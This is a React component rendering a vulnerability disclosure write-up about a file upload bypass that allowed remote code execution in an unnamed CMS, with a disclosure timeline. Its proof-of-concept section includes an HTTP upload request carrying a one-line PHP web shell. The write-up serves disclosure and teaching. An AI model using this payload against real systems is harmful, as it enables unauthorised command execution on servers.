import React from 'react';
import { 
  Box, 
  Typography, 
  Paper, 
  Divider, 
  Chip, 
  List, 
  ListItem, 
  ListItemText, 
  Alert 
} from '@mui/material';

export default function SecurityResearchProject() {
  return (
    <Paper sx={{ p: 5, bgcolor: 'background.paper', borderRadius: 2 }}>
      {/* Header */}
      <Typography variant="h3" gutterBottom sx={{ color: 'primary.main', fontWeight: 'bold' }}>
        Discovering a 0-Day in Popular CMS
      </Typography>
      
      <Box sx={{ mb: 4 }}>
        <Chip label="Severity: Critical" color="error" sx={{ mr: 1 }} />
        <Chip label="Status: Resolved" color="success" />
      </Box>

      {/* 1. Executive Summary */}
      <Typography variant="h5" sx={{ mt: 4, fontWeight: 'bold' }}>1. Executive Summary</Typography>
      <Typography variant="body1" paragraph>
        During a security audit of a widely deployed open-source CMS, I identified an 
        unauthenticated Remote Code Execution (RCE) vulnerability. This vulnerability 
        could allow an attacker to bypass file upload restrictions, leading to full 
        server compromise.
      </Typography>

      {/* 2. Technical Analysis */}
      <Typography variant="h5" sx={{ mt: 4, fontWeight: 'bold' }}>2. Technical Analysis</Typography>
      <Typography variant="body1" paragraph>
        The flaw existed in the media processing module, which failed to adequately 
        sanitize file extensions when using a specific plugin integration. By chaining 
        an `index.php` bypass with a directory traversal payload, I was able to 
        execute arbitrary PHP code on the underlying host.
      </Typography>

      {/* 3. Proof of Concept */}
      <Typography variant="h5" sx={{ mt: 4, fontWeight: 'bold' }}>3. Proof of Concept (PoC)</Typography>
      <Typography variant="body1" paragraph>
        The following request demonstrates how the file upload restriction was bypassed:
      </Typography>
      
      <Alert severity="warning" sx={{ mb: 2 }}>
        Note: Conducted in a controlled environment for educational purposes.
      </Alert>

      <Box component="pre" sx={{ 
        bgcolor: '#1e1e1e', 
        color: '#d4d4d4', 
        p: 2, 
        borderRadius: 1, 
        overflowX: 'auto',
        fontSize: '0.85rem' 
      }}>
        {`POST /api/v1/upload HTTP/1.1
Host: target-cms.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="shell.php.jpg"
Content-Type: application/x-php

<?php echo system($_GET['cmd']); ?>
------WebKitFormBoundary--`}
      </Box>

      {/* 4. Timeline */}
      <Typography variant="h5" sx={{ mt: 4, fontWeight: 'bold' }}>4. Timeline of Disclosure</Typography>
      <List>
        <ListItem><ListItemText primary="Nov 10, 2024: Vulnerability identified and reproduced." /></ListItem>
        <ListItem><ListItemText primary="Nov 12, 2024: Initial report submitted to vendor via encrypted channel." /></ListItem>
        <ListItem><ListItemText primary="Nov 15, 2024: Vendor confirmed the flaw and began patching." /></ListItem>
        <ListItem><ListItemText primary="Dec 15, 2024: Patch released and public disclosure authorized." /></ListItem>
      </List>

      <Divider sx={{ my: 4 }} />

      {/* 5. Learnings */}
      <Typography variant="h5" sx={{ fontWeight: 'bold' }}>Learnings & Impact</Typography>
      <Typography variant="body1" sx={{ mt: 2 }}>
        This experience reinforced the importance of <strong>Defense-in-Depth</strong>. 
        Even with strict server configurations, application-level sanitization remains the 
        final, most critical line of defense against modern web-based threats.
      </Typography>
    </Paper>
  );
}